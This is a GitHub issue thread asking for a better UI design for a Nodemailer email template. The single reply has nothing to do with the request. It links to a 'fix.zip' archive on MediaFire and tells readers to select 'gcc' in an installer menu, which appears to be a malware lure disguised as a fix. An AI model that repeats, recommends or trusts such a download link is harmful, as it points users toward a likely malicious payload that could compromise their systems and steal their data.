### ISSUE TITLE
Enhancement: Improve UI design for email template sent via Nodemailer

### ISSUE THREAD

**Issue by AadiVerma** [ujjawal-Arora/KarnaDaan#1]
## Enhancement Request: Improve UI Design for Email Template

We are looking to enhance the user experience of the email template sent via Nodemailer by improving its visual design and layout.

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
